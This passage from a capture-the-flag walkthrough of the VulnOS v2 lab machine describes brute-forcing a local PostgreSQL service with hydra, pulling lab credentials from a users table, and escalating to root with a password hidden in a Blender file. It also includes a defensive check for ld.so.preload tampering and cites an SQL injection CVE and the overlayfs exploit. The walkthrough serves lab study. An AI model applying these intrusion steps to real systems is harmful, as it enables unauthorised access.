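if __name__ == "__main__":
    for sev, msg in demo_constructed():
        print(f"[{sev}] {msg}")
    for sev, msg in audit_ld_preload():  # the live host's own file, if present
        print(f"[{sev}] {msg}")
```

The exploit's helper library deletes /etc/ld.so.preload once su has run, so this check is most useful from a periodic integrity job or a file-creation audit rule on /etc/ld.so.preload rather than a one-off look.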

Other attempts at getting a shell

After logging into the web interface with the webmin credentials obtained earlier, the allowed upload file types can be extended, which makes it possible to upload a PHP script.

The PHP script uploads successfully, but requesting it shows that the server does not execute it.

Other ways to obtain root

There is a post.tar.gz file in the /home/webmin directory

Extracting it, it appears to be a copy of "hydra". Why would that be here?
Running "netstat -antp" shows that only the mysql (port 3306) and postgresql (port 5432) database services are running locally, bound to 127.0.0.1 only.

So there is a local copy of hydra, a password brute-forcer, and a service that is reachable only locally.
First enter the "post" directory and build it by running "./configure" followed by "make". There is no need to run "make install"; that is up to you. "make" alone is enough.
Type ./hydra --help to check that everything works.

First brute-force the local postgres database on port 5432.
For simplicity, use the wordlist "postgres_default_pass.txt" shipped with metasploit-framework.
The wordlist only needs to be fetched onto the target machine.
Start the apache web server on the local attack machine, copy the wordlist into the public html folder, then fetch it from the "webmin" shell on the target machine.

Then start hydra to brute-force the service

Success! The postgresql database credentials are now known: postgres:posgtres.
Still as "webmin", log in to the postgresql database and look around.

\c system

\dt

select * from users;

This yields the username

vulnosadmin

and the password

c4nuh4ckm3tw1c3

These credentials log in over SSH successfully

root@kali:~# ssh vulnosadmin@192.168.56.104
Enter passphrase for key '/root/.ssh/id_rsa':
vulnosadmin@192.168.56.104's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Apr 20 05:11:47 CEST 2020

System load: 0.0 Processes: 86
Usage of /: 5.8% of 29.91GB Users logged in: 0
Memory usage: 16% IP address for eth0: 192.168.56.104
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Wed May 4 19:35:16 2016 from 192.168.56.101
vulnosadmin@VulnOSv2:~$ id
uid=1000(vulnosadmin) gid=1000(vulnosadmin) groups=1000(vulnosadmin),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
vulnosadmin@VulnOSv2:~$ whoami
vulnosadmin

A strange file turns up in the home directory of user "vulnosadmin".

Inspecting it, it appears to be a Blender 3D file. Blender 3D is a 3D modelling and animation application.

vulnosadmin@VulnOSv2:~$ ls
r00t.blend

Opening the file in Blender shows a 3D cube, displayed in solid mode.

A string is obtained from it; try it as the root password

ab12fg//drg

vulnosadmin@VulnOSv2:~$ su root
Password:
root@VulnOSv2:/home/vulnosadmin# id
uid=0(root) gid=0(root) groups=0(root)
root@VulnOSv2:/home/vulnosadmin# whoami
root
root@VulnOSv2:/home/vulnosadmin# cd /root
root@VulnOSv2:~# ls
flag.txt
root@VulnOSv2:~# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Logged in successfully and got the flag

Summary of key points

  • OpenDocMan 1.2.7 CMS SQL injection (CVE-2014-1945)
  • Linux kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) "overlayfs" local privilege escalation
  • Brute-forcing the postgresql database username and password with hydra
  • Opening the .blend 3D model file in Blender to find the root user's SSH password

Game over

Sorry, this time I still could not find that Greek guru's foolproof one-click clear-the-box script. I am so sorry about this… It's a pity…

The end, to be continued…